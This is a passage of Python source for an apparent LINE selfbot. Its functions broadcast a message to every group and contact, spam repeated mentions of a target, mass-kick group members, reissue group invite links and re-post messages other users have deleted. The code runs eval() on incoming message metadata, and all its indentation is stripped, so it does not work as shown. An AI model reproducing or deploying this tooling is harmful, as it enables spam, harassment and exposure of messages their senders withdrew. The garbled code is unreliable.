if len(msg.text.split("\n")) >= 2:
a = self.getGroupIdsJoined()
for i in a:
G = self.getGroup(i)
if len(G.members) > wait["Members"]:
self.sendMessage(i,msg.text.replace(msg.text.split("\n")[0]+"\n",""))
a = self.getAllContactIds()
for i in a:
self.sendMessage(i,msg.text.replace(msg.text.split("\n")[0]+"\n",""))
def setname(self,to,msg,wait):
msg.text = self.mycmd(msg.text,wait)
profile = self.getProfile()
if len(msg.text.split(" ")) <= 2 or len(msg.text.split("\n")) <= 1:self.sendMessage(to,profile.displayName)
if len(msg.text.split("\n")) >= 2:
profiles = self.getProfile()
profile = self.getProfile()
profile.displayName = msg.text.replace(msg.text.split("\n")[0]+"\n","")
wait['talkban']['name'] = profile.displayName
self.updateProfileAttribute(2, profile.displayName)
self.sendMessage(to,"Sukses mengubah nama."+profile.displayName+"\nmenjadi "+profile.displayName)
def setfancy(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
wait['timeline'] = []
wait['timeline'] = msg.text.split("\n")[1:]
d = 'Fancy Name Set to:'
for a in wait['timeline']:
d+= '\n{}'.format(a)
self.sendMessage(msg.to,'{}'.format(d))
def setbio(self,to,msg,wait):
msg.text = self.mycmd(msg.text,wait)
profile = self.getProfile()
if len(msg.text.split(" ")) <= 2 or len(msg.text.split("\n")) <= 1:self.sendMessage(to,profile.statusMessage)
if len(msg.text.split("\n")) >= 2:
profile.statusMessage = msg.text.replace(msg.text.split("\n")[0]+"\n","")
self.updateProfileAttribute(16, profile.statusMessage)
self.sendMessage(to,"Sukses mengubah bio." + profile.statusMessage+" ")
def adityaarchi(self,wait,sd,dd,ss,split,msg,tex,nama=[]):
selection = AdityaSplitGood(split,range(1,len(nama)+1))
k = len(nama)//100
for a in range(k+1):
if a == 0:eto='╭「 '+sd+' 」─'+tex
else:eto='├「 '+sd+' 」─'+tex
text = ''
mids = []
no = a
for i in selection.parse()[a*100 : (a+1)*100]:
mids.append(nama[i-1])
if dd == 'kick':self.kickoutFromGroup(ss,[nama[i-1]]);hh = ''
if dd == 'delfriend':
try:self.AdityadeleteContact(nama[i-1]);hh = 'Del Friend'
except:hh = 'Not Friend User'
if dd == 'delbl':
try:wait['blacklist'].remove(nama[i-1]);hh = 'Del BL'
except:hh = 'Not BL User'
if dd == 'delwl':
try:wait['bots'].remove(nama[i-1]);hh = 'Del WL'
except:hh = 'Not WL User'
if dd == 'delml':
try:wait['target'].remove(nama[i-1]);hh = 'Del ML'
except:hh = 'Not ML User'
if dd == 'delblock':
try:self.unblockContact(nama[i-1]);hh = 'Del Block'
except:hh = 'Not Block User'
if dd == '':hh = ''
if dd == 'tag':hh = ''
no+= 1
if no == len(selection.parse()):text+= "\n╰{}. @! {}".format(i,hh)
else:text+= "\n│{}. @! {}".format(i,hh)
if dd == 'tag':self.sendMention(ss,eto+text,sd,mids)
else:self.sendMention(msg.to,eto+text,sd,mids)
if dd == 'tag':self.sendMessage(msg.to,'╭「 Mention 」{}\n╰Status: Successfully tagged {} members'.format(tex,len(selection.parse())))
def delgroups(self,to,dits):
gid = self.getGroupIdsJoined()
if len(dits.split(" ")) == 3:
selection = AdityaSplitGood(dits.split(' ')[2],range(1,len(gid)+1))
k = len(gid)//100
for a in range(k+1):
if a == 0:eto='╭「 Leave Group 」─'
else:eto='├「 Leave Group 」─'
text = ''
no = 0
for i in selection.parse()[a*100 : (a+1)*100]:
self.leaveGroup(gid[i - 1])
no+=1
if no == len(selection.parse()):text+= "\n╰{}. {}".format(i,self.getGroup(gid[i - 1]).name)
else:text+= "\n│{}. {}".format(i,self.getGroup(gid[i - 1]).name)
self.sendMessage(to,eto+text)
def openqr(self,to,dits):
gid = self.getGroupIdsJoined()
if len(dits.split(" ")) == 3:
selection = AdityaSplitGood(dits.split(' ')[2],range(1,len(gid)+1))
k = len(gid)//100
for a in range(k+1):
if a == 0:eto='╭「 QR Group 」─'
else:eto='├「 QR Group 」─'
text = ''
no = 0
for i in selection.parse()[a*100 : (a+1)*100]:
group = self.getGroup(gid[i - 1])
if group.preventedJoinByTicket == True:
group.preventedJoinByTicket = False
self.updateGroup(group)
no+=1
if no == len(selection.parse()):text+= "\n│{}. {}\n╰ line://ti/g/{}".format(i,self.getGroup(gid[i - 1]).name,self.reissueGroupTicket(gid[i - 1]))
else:text+= "\n│{}. {}\n│ line://ti/g/{}".format(i,self.getGroup(gid[i - 1]).name,self.reissueGroupTicket(gid[i - 1]))
self.sendMessage(to,eto+text)
def lsgroup(self,msg,wait,dits):
to = msg.to
gid = self.getGroupIdsJoined()
group = self.getGroup(gid[int(dits.split(' ')[1])-1])
nama = [a.mid for a in group.members]
if len(dits.split(" ")) == 2:
total = "Local ID: {}".format(int(dits.split(' ')[1]))
self.datamention(msg,'List Member',nama,'\n├Group: '+group.name[:20]+'\n├'+total)
if len(dits.split(" ")) == 4:
if dits.startswith('grouplist '+dits.split(' ')[1]+' mem '):self.getinformation(to,nama[int(dits.split(' ')[3])-1],wait)
if dits.startswith('grouplist '+dits.split(' ')[1]+' tag'):self.adityaarchi(wait,'Mention','tag',gid[int(dits.split(' ')[1])-1],dits.split(' ')[3],msg,"\n├Group: {}\n├Local ID: {}".format(group.name[:20],int(dits.split(' ')[1])),nama=nama)
if dits.startswith('grouplist '+dits.split(' ')[1]+' kick'):self.adityaarchi(wait,'Kick Member','kick',gid[int(dits.split(' ')[1])-1],dits.split(' ')[3],msg,"\n├Group: {}\n├Local ID: {}".format(group.name[:20],int(dits.split(' ')[1])),nama=nama)
def mentionbynum(self,to,wait,msg,cmd):
if 'MENTION' in msg.contentMetadata.keys()!=None:self.datamention(msg,'Spam',[eval(msg.contentMetadata["MENTION"])["MENTIONEES"][0]["M"]]*int(cmd.split(" ")[1]))
else:
msg.text = self.mycmd(msg.text,wait)
if msg.toType == 2:
if msg.text.lower().startswith('mention '):
group = self.getGroup(to)
nama = [contact.mid for contact in group.members]
try:self.adityaarchi(wait,'Mention','',to,self.adityasplittext(msg.text),msg,'\n├Group: '+group.name[:20],nama=nama)
except:self.datamention(msg,'Mention',[])
if msg.text.lower().startswith('mentionsort '):
texst = self.adityasplittext(cmd)
gs = self.getGroup(to)
c = ['{}:-:{}'.format(a.displayName,a.mid) for a in gs.members]
c.sort()
b = []
for s in c:
if len(texst) == 1:dd = s[len(texst)-1].lower()
else:dd = s[:len(texst)].lower()
if texst in dd:b.append(s.split(':-:')[1])
self.datamention(msg,'Mentioning',b)
if msg.text.lower().startswith('mentionname '):
texst = self.adityasplittext(cmd)
gs = self.getGroup(to)
c = ['{}:-:{}'.format(a.displayName,a.mid) for a in gs.members]
c.sort()
b = []
for s in c:
if texst in s.split(':-:')[0].lower():b.append(s.split(':-:')[1])
self.datamention(msg,'Mentioning',b)
else:
self.datamention(msg,'Spam',[to]*int(cmd.split(" ")[1]))
def mentionall(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
try:group = self.getGroup(msg.to);nama = [contact.mid for contact in group.members];nama.remove(self.getProfile().mid)
except:group = self.getRoom(msg.to);nama = [contact.mid for contact in group.contacts]
if msg.text.lower() == "mentionall":
self.datamention(msg,'Mention',nama)
if msg.text.lower() == "mentionall -s":
self.unsendMessage(msg.id)
k = len(nama)//100
for a in range(k+1):
if msg.text.lower() == "mentionall":
self.datamention(msg,'Mention',nama)
else:
if a == 0:self.mentionmention(to=msg.to,wait=wait,text='',dataMid=nama[:100],pl=0,ps=' 「 Mentionall 」',pg='MENTIONALLUNSED',pt=nama)
else:self.mentionmention(to=msg.to,wait=wait,text='',dataMid=nama[a*100 : (a+1)*100],pl=a*100,ps=' ',pg='MENTIONALLUNSED',pt=nama)
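# giftmessage(): sends a random LINE gift sticker (contentType 9) from package
# 1380280. getinformation() below replies with a contact card and white/blacklist
# flags for a user mid, or a group summary card when the contact lookup fails.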
@loggedIn
def giftmessage(self,to):
a = ("5","7","6","8")
b = random.choice(a)
return self.sendMessage(to, text=None, contentMetadata={'PRDTYPE': 'STICKER','STKVER': '1','MSGTPL': b,'STKPKGID': '1380280'}, contentType=9)
def getinformation(self,to,mid,data):
try:
if mid in data["bots"]:a = "Whitelisted: Yes\n"
else:a = "Whitelisted: No\n"
if mid in data["blacklist"]:b = "Blacklisted: Yes"
else:b = "Blacklisted: No"
h = self.getContact(mid).statusMessage
if h == '':hh = '\n'
else:hh = "Status:\n" + h + "\n\n"
zxc = " 「 INFO 」\nName: @!\n" + hh + "User ID:\n" + mid + "\n"+a+" "+b
self.sendMention(to, zxc, '',[mid])
self.sendContact(to,mid)
except:
ginfo = self.getCompactGroup(mid)
try:
gCreators = ginfo.creator.mid;gtime = ginfo.createdTime
except:
gCreators = ginfo.members[0].mid;gtime = ginfo.createdTime
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventedJoinByTicket == True:u = "Disable"
else:u = "line://ti/g/" + self.reissueGroupTicket(mid)
zxc = " 「 ID 」\nGroup Name:\n{}\n\nGroup ID:\n{}\n\nAnggota: {}\nInvitation: {}\nTicket:{}\n\nCreated at:\n{}\nby @!".format(ginfo.name,mid,len(ginfo.members),sinvitee,u,humanize.naturaltime(datetime.fromtimestamp(gtime/1000)))
self.sendMention(to,zxc,'',[gCreators])
self.sendContact(to,gCreators)
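# sendall(): downloads a sticker package's productInfo.meta and sends every
# sticker in it one by one; if sticker messages fail it falls back to posting
# the raw PNGs from the sticker CDN.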
def sendall(self,to,text):
try:
r = requests.get("http://dl.stickershop.line.naver.jp/products/0/0/1/"+text+"/android/productInfo.meta")
data = r.json()
for a in data['stickers']:
b = str(a['id'])
self.sendMessage(to,text=None,contentMetadata={"STKID": str(a['id']),"STKPKGID": text,"STKTXT": "[Sticker]","STKVER": '1'}, contentType=7)
except Exception as e:
r = requests.get("http://dl.stickershop.line.naver.jp/products/0/0/1/"+text+"/android/productInfo.meta")
data = r.json()
for a in data['stickers']:
b = str(a['id'])
self.sendImageWithURL(to,'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+b+'/ANDROID/sticker.png')
def mentions(self,wait):a=wait["setkey"].title();return " 「 Mention 」\nMention By Number\n Command: "+a+"mention [1-5]\nMention By Name\n Command: "+a+"mentionsort [A-z]\n Command: "+a+"mentionname [A-z]\nSpam Mention\n Command: "+a+"mention [2|@]\nMentionall Member\n Command: "+a+"mentionall"
def keluarinmanteman(self,msg,wait,sas):
if msg.text.lower() == 'bye':
for a in sas:
a.leaveGroup(msg.to)
def manggilmanteman(self,msg,wait,sas):
if msg.text.lower() == 'adit~':
kitsune = msg.to
G = self.getGroup(kitsune)
ginfo = self.getGroup(kitsune)
G.preventedJoinByTicket = False
self.updateGroup(G)
invsend = 0
Ticket = self.reissueGroupTicket(kitsune)
for a in sas:
a.acceptGroupInvitationByTicket(kitsune,Ticket)
G = self.getGroup(kitsune)
ginfo = self.getGroup(kitsune)
G.preventedJoinByTicket = True
random.choice(sas).updateGroup(G)
def listsimpanan(self,text,data={}):
if data == {}:
msgs = " 「 {} List 」\nNo {}".format(text,text)
else:
no=0
msgs=" 「 {} List 」\n{} List:".format(text,text)
for a in data:
no+=1
if no % 2 == 0:msgs+=" %i. %s" % (no, a)
else:msgs+="\n%i. %s" % (no, a)
msgs+="\n\nTotal {} List: {}".format(text,len(data))
return msgs
def setsticker(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
separate = msg.text.lower().split(" ")
text = msg.text.lower().replace(separate[0]+" "+separate[1]+" ","")
wait["Sticker"][text] = '{}'.format(text)
wait["Img"] = '{}'.format(text)
wait["Addsticker"] = True
self.sendMessage(msg.to, " 「 Sticker 」\nSend the sticker")
def setstickerauto(self,wait,msg):
if msg.to not in wait["GROUP"]['AR']['S']:
wait["GROUP"]['AR']['S'][msg.to] = {'AP':False,'Sticker':{}}
wait["GROUP"]['AR']['S'][msg.to]['AP'] = True
self.sendMessage(msg.to, " 「 Sticker 」\nSend the sticker")
def welcomeon(self,wait,msg):
if msg.to in wait["GROUP"]['WM']['AP']:
msgs=" 「 Welcome Message 」\nWelcome Message already ENABLED♪"
else:
msgs=" 「 Welcome Message 」\nWelcome Message set to ENABLED♪"
wait["GROUP"]['WM']['AP'].append(msg.to)
return msgs
def welcomeoff(self,wait,msg):
if msg.to not in wait["GROUP"]['WM']['AP']:
msgs=" 「 Welcome Message 」\nWelcome Message already DISABLED♪"
else:
msgs=" 「 Welcome Message 」\nWelcome Message set to DISABLED♪"
wait["GROUP"]['WM']['AP'].remove(msg.to)
return msgs
def leaveoff(self,wait,msg):
if msg.to not in wait["GROUP"]['LM']['AP']:
msgs=" 「 Leave Message 」\nLeave Message already DISABLED♪"
else:
msgs=" 「 Leave Message 」\nLeave Message set to DISABLED♪"
wait["GROUP"]['LM']['AP'].remove(msg.to)
return msgs
def welcomemsgset(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if len(msg.text.split("\n")) >= 2:
wait["GROUP"]['WM']['P'][msg.to] = msg.text.replace(msg.text.split("\n")[0]+"\n","").replace('|',' @!')
self.sendMessage(msg.to," 「 Welcome Message 」\nWelcome Message has been set to:\n" + wait["GROUP"]['WM']['P'][msg.to])
def welcome(self,wait,msg):
if msg.to in wait["GROUP"]['WM']['AP']:
msgs=" 「 Welcome Message 」\nWelcome Message: ON♪"
if msg.to in wait["GROUP"]['WM']['S']:
a = self.shop.getProduct(packageID=int(wait["GROUP"]['WM']['S'][msg.to]['Sticker']['STKPKGID']), language='ID', country='ID')
msgs+="\nSticker: " + a.title
else:msgs+=''
if msg.to in wait["GROUP"]['WM']['P']:
if wait["GROUP"]['WM']['P'][msg.to] == '':msgs+= ''
else:msgs+="\nMessage: \n" + wait["GROUP"]['WM']['P'][msg.to] + "\n"
else:msgs+=''
else:
msgs=" 「 Welcome Message 」\nWelcome Message: OFF"
if msg.to in wait["GROUP"]['WM']['S']:
a = self.shop.getProduct(packageID=int(wait["GROUP"]['WM']['S'][msg.to]['Sticker']['STKPKGID']), language='ID', country='ID')
msgs+="\nSticker: " + a.title
else:msgs+=''
if msg.to in wait["GROUP"]['WM']['P']:
if wait["GROUP"]['WM']['P'][msg.to] == '':msgs+= ''
else:msgs+="\nMessage: \n" + wait["GROUP"]['WM']['P'][msg.to] + "\n"
else:msgs+=''
return msgs+"\n |Command|\n- Welcome Set\n Usage:"+wait["setkey"].title()+" welcome [on|off]\n- Welcome Sticker\n Usage:"+wait["setkey"].title()+" add welcome sticker\n- Welcome msg setting\n Usage:"+wait["setkey"].title()+" welcome msg set <text>\n OR:"+wait["setkey"].title()+" welcome msg set <text|text>"
def setstickerwelcome(self,wait,msg):
if msg.to not in wait["GROUP"]['WM']['S']:
wait["GROUP"]['WM']['S'][msg.to] = {'AP':False,'Sticker':{}}
wait["GROUP"]['WM']['S'][msg.to]['AP'] = True
self.sendMessage(msg.to, " 「 Sticker 」\nSend the sticker")
def leaveon(self,wait,msg):
if msg.to in wait["GROUP"]['LM']['AP']:
msgs=" 「 Leave Message 」\nLeave Message already ENABLED♪"
else:
msgs=" 「 Leave Message 」\nLeave Message set to ENABLED♪"
wait["GROUP"]['LM']['AP'].append(msg.to)
return msgs
def leavemsgset(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if len(msg.text.split("\n")) >= 2:
wait["GROUP"]['LM']['P'][msg.to] = msg.text.replace(msg.text.split("\n")[0]+"\n","")
self.sendMessage(msg.to," 「 Leave Message 」\nLeave Message has been set to:\n" + wait["GROUP"]['LM']['P'][msg.to])
def leave(self,wait,msg):
if msg.to in wait["GROUP"]['LM']['AP']:
msgs=" 「 Leave Message 」\nLeave Message: ON♪"
if msg.to in wait["GROUP"]['LM']['S']:
a = self.shop.getProduct(packageID=int(wait["GROUP"]['LM']['S'][msg.to]['Sticker']['STKPKGID']), language='ID', country='ID')
msgs+="\nSticker: " + a.title
else:msgs+=''
if msg.to in wait["GROUP"]['LM']['P']:
if wait["GROUP"]['LM']['P'][msg.to] == '':msgs+= ''
else:msgs+="\nMessage: \n" + wait["GROUP"]['LM']['P'][msg.to] + "\n"
else:msgs+=''
else:
msgs=" 「 Leave Message 」\nLeave Message: OFF"
if msg.to in wait["GROUP"]['LM']['S']:
a = self.shop.getProduct(packageID=int(wait["GROUP"]['LM']['S'][msg.to]['Sticker']['STKPKGID']), language='ID', country='ID')
msgs+="\nSticker: " + a.title
else:msgs+=''
if msg.to in wait["GROUP"]['LM']['P']:
if wait["GROUP"]['LM']['P'][msg.to] == '':msgs+= ''
else:msgs+="\nMessage: \n" + wait["GROUP"]['LM']['P'][msg.to] + "\n"
else:msgs+=''
return msgs+"\n |Command|\n- Leave Set\n Usage:"+wait["setkey"].title()+" leave [on|off]\n- Leave Sticker\n Usage:"+wait["setkey"].title()+" add leave sticker\n- Leave msg setting\n Usage:"+wait["setkey"].title()+" leave msg set <text>\n OR:"+wait["setkey"].title()+" leave msg set <text|text>"
def setstickerleave(self,wait,msg):
if msg.to not in wait["GROUP"]['LM']['S']:
wait["GROUP"]['LM']['S'][msg.to] = {'AP':False,'Sticker':{}}
wait["GROUP"]['LM']['S'][msg.to]['AP'] = True
self.sendMessage(msg.to, " 「 Sticker 」\nSend the sticker")
def delsetsticker(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
separate = msg.text.lower().split(" ")
text = msg.text.lower().replace(separate[0]+" "+separate[1]+" ","")
del wait["Sticker"][text]
self.sendMessage(msg.to, " 「 Sticker 」\nStatus: Delete {} From List".format(text))
def setImageS(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
separate = msg.text.lower().split(" ")
text = msg.text.lower().replace(separate[0]+" "+separate[1]+" ","")
wait["Images"][text] = 'dataSeen/{}.jpg'.format(text)
wait["Img"] = '{}'.format(text)
wait["Addimage"] = True
self.sendMessage(msg.to, " 「 Picture 」\nSend a Picture to save")
def unsend2(self,msg,wait):
try:
if msg.to not in wait['Unsend']:
wait['Unsend'][msg.to] = {'B':[]}
if msg._from not in [self.profile.mid]:
return
wait['Unsend'][msg.to]['B'].append(msg.id)
except:pass
def delImageS(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
separate = msg.text.lower().split(" ")
text = msg.text.lower().replace(separate[0]+" "+separate[1]+" ","")
try:
os.remove(wait["Images"][text])
except:pass
del wait["Images"][text]
self.sendMessage(msg.to, " 「 Picture 」\nStatus: Delete {} From List".format(text))
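# Re-sends received media: GIFs are downloaded and re-uploaded, while images, videos and audio are forwarded via their OBS download URL.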
def forward(self,msg):
if msg.toType == 2:to = msg.to
else:to = msg._from
if msg.contentType == 1:
try:
if msg.contentMetadata != {}:
path = self.downloadObjectMsg(msg.id,'path','dataSeen/m.gif',True)
a = threading.Thread(target=self.sendGIF, args=(to,path,)).start()
except:self.sendImageWithURL(to,'https://obs-sg.line-apps.com/talk/m/download.nhn?oid='+msg.id)
if msg.contentType == 2:self.sendVideoWithURL(to,'https://obs-sg.line-apps.com/talk/m/download.nhn?oid='+msg.id)
if msg.contentType == 3:self.sendAudioWithURL(to,'https://obs-sg.line-apps.com/talk/m/download.nhn?oid='+msg.id)
def surahlist(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower() == "quranlist":data = self.adityarequestweb("http://api.alquran.cloud/surah")
if msg.text.lower().startswith("qur'an "):data = self.adityarequestweb("http://api.alquran.cloud/surah/{}".format(self.adityasplittext(msg.text)))
if len(msg.text.split(' ')) == 1:
if data["data"] != []:
no = 0
ret_ = "╭──「 Al-Qur'an 」"
for music in data["data"]:
no += 1
if no == len(data['data']):ret_ += "\n╰{}. {}".format(no,music['englishName'])
else:ret_ += "\n│{}. {}".format(no,music['englishName'])
return self.sendMessage(msg.to,ret_)
if len(msg.text.split(' ')) == 2:
try:
no = 0
ret_ = " 「 Al-Qur'an 」\nSurah: {}".format(data['data']['englishName'])
for music in data["data"]["ayahs"]:
no += 1
ret_ += "\n{}. {}".format(no,music['text'])
k = len(ret_)//10000
for aa in range(k+1):
self.sendMessage(msg.to,'{}'.format(ret_[aa*10000 : (aa+1)*10000]))
except:self.sendMessage(msg.to," 「 Al-Qur'an 」\nI can't find surah number {}".format(self.adityasplittext(msg.text)))
if len(msg.text.split(' ')) == 3:
try:
nama = data["data"]["ayahs"]
selection = AdityaSplitGood(self.adityasplittext(msg.text.lower(),'s'),range(1,len(nama)+1))
k = len(nama)//100
text = " 「 Al-Qur'an 」\nSurah: {}".format(data['data']['englishName'])
no = 0
for i in selection.parse():
no+= 1
text+= "\n{}. {}".format(i,nama[i-1]['text'])
k = len(text)//10000
for aa in range(k+1):
self.sendMessage(msg.to,'{}'.format(text[aa*10000 : (aa+1)*10000]))
except:
self.sendMessage(msg.to," 「 Al-Qur'an 」\nI can't find surah number {}".format(self.adityasplittext(msg.text)))
def autoresponuy(self,msg,wait):
to = msg.to
if msg.to not in wait["GROUP"]['AR']['AP']:
return
if msg.to in wait["GROUP"]['AR']['S']:
self.sendMessage(msg.to,text=None,contentMetadata=wait["GROUP"]['AR']['S'][msg.to]['Sticker'], contentType=7)
if(wait["GROUP"]['AR']['P'][msg.to] in [""," ","\n",None]):
return
if '@!' not in wait["GROUP"]['AR']['P'][msg.to]:
wait["GROUP"]['AR']['P'][msg.to] = '@!'+wait["GROUP"]['AR']['P'][msg.to]
nama = self.getGroup(msg.to).name
sd = self.waktunjir()
self.sendMention(msg.to,wait["GROUP"]['AR']['P'][msg.to].replace('greeting',sd).replace(';',nama),' 「 Welcome Message 」\n',[msg._from]*wait["GROUP"]['AR']['P'][msg.to].count('@!'))
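# Reports unsent (deleted) messages back to the chat, re-sending the cached text/media, with per-sender flood tracking that temporarily mutes noisy users.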
def detectunsend(self,op,wait,kuciyose):
try:
msg = kuciyose['tos'][op.param1][op.param2]['msg']
if kuciyose['tos'][op.param1]['setset'] == True:
if msg._from in wait['talkblacklist']['tos']:
if wait['talkblacklist']['tos'][msg._from]["expire"] == True:
return
elif time.time() - wait['talkblacklist']['tos'][msg._from]["time"] <= 5:
wait['talkblacklist']['tos'][msg._from]["flood"] += 1
if wait['talkblacklist']['tos'][msg._from]["flood"] >= 10:
wait['talkblacklist']['tos'][msg._from]["flood"] = 0
wait['talkblacklist']['tos'][msg._from]["expire"] = True
self.sendMention(msg.to, " 「 FLOOD 」\nSorry @!, unsend reports from you @! will be muted for 30 seconds",'',[msg._from]*2)
else:
wait['talkblacklist']['tos'][msg._from]["flood"] = 0
wait['talkblacklist']['tos'][msg._from]["time"] = time.time()
else:
wait['talkblacklist']['tos'][msg._from] = {"time": time.time(),"flood": 0,"expire": False}
if op.param2 in kuciyose['tos'][op.param1]:
wait['GN'] = msg
if msg.contentType == 0:dd = '\nType: Text'
else:dd = '\nType: {}'.format(ContentType._VALUES_TO_NAMES[msg.contentType])
aa = '\nCreatedTime: {}{}\nText:\n'.format(humanize.naturaltime(datetime.fromtimestamp(msg.createdTime/1000)),dd)
if msg.contentType == 0:
if 'MENTION' in msg.contentMetadata:
msg.text = ' 「 Unsend 」\nFrom: @ADIT GANTENG '+aa+msg.text
gd = [{'S':str(0+len(' 「 Unsend 」\nFrom: ')), 'E':str(len('@ADIT GANTENG ')+len(' 「 Unsend 」\nFrom: ')), 'M':msg._from}]
for key in eval(msg.contentMetadata["MENTION"])["MENTIONEES"]:
gd.append({'S':str(int(key['S'])+len(' 「 Unsend 」\nFrom: @ADIT GANTENG '+aa)), 'E':str(int(key['E'])+len(' 「 Unsend 」\nFrom: @ADIT GANTENG '+aa)),'M':key['M']})
msg.contentMetadata = {'AGENT_LINK': 'line://ti/p/~{}'.format(self.profile.userid),'AGENT_ICON': "http://dl.profile.line-cdn.net/" + self.getProfile().picturePath,'AGENT_NAME': ' 「 UNSEND DETECT 」',
'MENTION': str('{"MENTIONEES":' + json.dumps(gd) + '}')}
self.sendMessages(msg)
else:
if msg.location != None:aa = aa.replace('Text','Location').replace('\nText:','');self.sendMessages(msg)
if msg.text != None: asdd = msg.text
else:asdd = ''
self.sendMention(op.param1,' 「 Unsend 」\nFrom: @! {}{}'.format(aa,asdd),'',[msg._from])
else:
a = ' 「 Unsend 」\nFrom: @!\nCreatedTime: {}{}'.format(humanize.naturaltime(datetime.fromtimestamp(msg.createdTime/1000)),dd)
try:
self.sendMessages(msg)
except:
agh = self.shop.getProduct(packageID=int(msg.contentMetadata['STKPKGID']), language='ID', country='ID')
if agh.hasAnimation == True:
path = self.downloadFileURL('https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(msg.contentMetadata['STKID'])+'/IOS/sticker_animation@2x.png', 'path','sticker.png')
asd=subprocess.getoutput('apng2gif sticker.png')
self.sendMention(op.param1,a,'',[msg._from])
return threading.Thread(target=self.sendGIF, args=(op.param1,'sticker.gif',)).start()
self.sendImageWithURL(op.param1,'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(msg.contentMetadata['STKID'])+'/ANDROID/sticker.png')
asdf = ' 「 Unsend 」\nFrom: @!\nCreatedTime: {}{}'.format(humanize.naturaltime(datetime.fromtimestamp(msg.createdTime/1000)),dd)
if msg.contentType == 1:
try:
if msg.contentMetadata != {}:a = threading.Thread(target=self.sendGIF, args=(op.param1,kuciyose['tos'][op.param1][op.param2]['path'],)).start()
except:self.sendImage(op.param1,kuciyose['tos'][op.param1][op.param2]['path'])
if msg.contentType == 2:self.sendVideo(op.param1,kuciyose['tos'][op.param1][op.param2]['path']);os.remove(kuciyose['tos'][op.param1][op.param2]['path'])
if msg.contentType == 3:self.sendAudio(op.param1,kuciyose['tos'][op.param1][op.param2]['path']);os.remove(kuciyose['tos'][op.param1][op.param2]['path'])
if msg.contentType == 14:self.sendFile(op.param1,kuciyose['tos'][op.param1][op.param2]['path'], file_name='',ct = msg.contentMetadata)
self.sendMention(op.param1,asdf,'',[msg._from])
del kuciyose['tos'][op.param1][op.param2]
except:
pass
def unsendon(self,wait,msg,kuciyose):
if 'tos' not in wait:wait['tos'] = {}
if msg.to not in wait['tos']:wait['tos'][msg.to] = {}
if 'setset' not in wait['tos'][msg.to]:wait['tos'][msg.to]['setset'] = False
if wait['tos'][msg.to]['setset'] == True:
return self.sendMessage(msg.to,' 「 Unsend 」\nUnsend Detection already Set ON')
wait['tos'][msg.to]['setset'] = True
self.sendMessage(msg.to,' 「 Unsend 」\nUnsend Detection Set ON')
def unsendoff(self,wait,msg,kuciyose):
if 'tos' not in wait:wait['tos'] = {}
if msg.to not in wait['tos']:wait['tos'][msg.to] = {}
if 'setset' not in wait['tos'][msg.to]:wait['tos'][msg.to]['setset'] = False
if wait['tos'][msg.to]['setset'] == False:
return self.sendMessage(msg.to,' 「 Unsend 」\nUnsend Detection already Set OFF')
del wait['tos'][msg.to]
self.sendMessage(msg.to,' 「 Unsend 」\nUnsend Detection Set OFF')
def delExpire(self,wait):
try:
if wait['talkblacklist']['tos'] != {}:
for tmp in wait['talkblacklist']['tos']:
if wait['talkblacklist']['tos'][tmp]["expire"] == True:
if time.time() - wait['talkblacklist']['tos'][tmp]["time"] >= 3*10:
wait['talkblacklist']['tos'][tmp]["expire"] = False
wait['talkblacklist']['tos'][tmp]["time"] = time.time()
try:
self.sendMessage(tmp, " 「 FLOOD Notify 」\nis now Active!")
except:
pass
except:wait['talkblacklist']['tos'] = {}
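# Per-room flood guard: more than 15 messages within 5 seconds marks the room as expired (muted) until delExpire() re-enables it.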
def limitlimit(self,to,wait):
try:
if to in wait['talkblacklist']['tos']:
if wait['talkblacklist']['tos'][to]["expire"] == True:
return
elif time.time() - wait['talkblacklist']['tos'][to]["time"] <= 5:
wait['talkblacklist']['tos'][to]["flood"] += 1
if wait['talkblacklist']['tos'][to]["flood"] >= 15:
wait['talkblacklist']['tos'][to]["flood"] = 0
wait['talkblacklist']['tos'][to]["expire"] = True
self.sendMessage(to, " 「 FLOOD Notify 」\nGroup in spaming!\nsorry I will mute bot on 30 seconds in this room!")
else:
wait['talkblacklist']['tos'][to]["flood"] = 0
wait['talkblacklist']['tos'][to]["time"] = time.time()
else:
wait['talkblacklist']['tos'][to] = {"time": time.time(),"flood": 0,"expire": False}
except:wait['talkblacklist']['tos'] = {}
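# Main per-message hook: applies auto-read, caches messages/media for unsend detection, and mirrors messages from mimic targets.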
def autoredanu(self,msg,wait,kuciyose):
if msg.toType == 0:
if msg._from != self.getProfile().mid:
to = msg._from
else:
to = msg.to
else:
to = msg.to
soloi = threading.Thread(target=self.limitlimit, args=(to,kuciyose,)).start()
if wait["autoread1"] == True:self.sendChatChecked(msg._from,msg.id)
if wait["autoread2"] == True:self.sendChatChecked(msg.to,msg.id)
try:
if wait['tos'][to]['setset'] == True:
if to not in kuciyose['tos']:kuciyose['tos'][to] = {}
kuciyose['tos'][to]['setset'] = True
kuciyose['tos'][to][msg.id] = {'msg':msg}
if msg.contentType == 1:
try:
if msg.contentMetadata != {}:path = self.downloadObjectMsg(msg.id,'path','dataSeen/%s.gif' % msg.id,True);kuciyose['tos'][to][msg.id]['path'] = path
except:path = self.downloadObjectMsg(msg.id);kuciyose['tos'][to][msg.id]['path'] = path
if msg.contentType == 2 or msg.contentType == 3 or msg.contentType == 14:path = self.downloadObjectMsg(msg.id);kuciyose['tos'][to][msg.id]['path'] = path
else:kuciyose['tos'][to]['setset'] = False
except:
e = traceback.format_exc()
wait['tos'][to] = {}
if msg._from in wait["target"] and wait["status"] == True:
if msg.contentType == 4:
return
if msg.text is not None:
wait['GN'] = msg
self.sendMessages(msg)
self.forward(msg)
else:
try:return self.sendMessages(msg)
except:
a = self.shop.getProduct(packageID=int(msg.contentMetadata['STKPKGID']), language='ID', country='ID')
if a.hasAnimation == True:
path = self.downloadFileURL('https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(msg.contentMetadata['STKID'])+'/IOS/sticker_animation@2x.png', 'path','sticker.png')
a=subprocess.getoutput('apng2gif sticker.png')
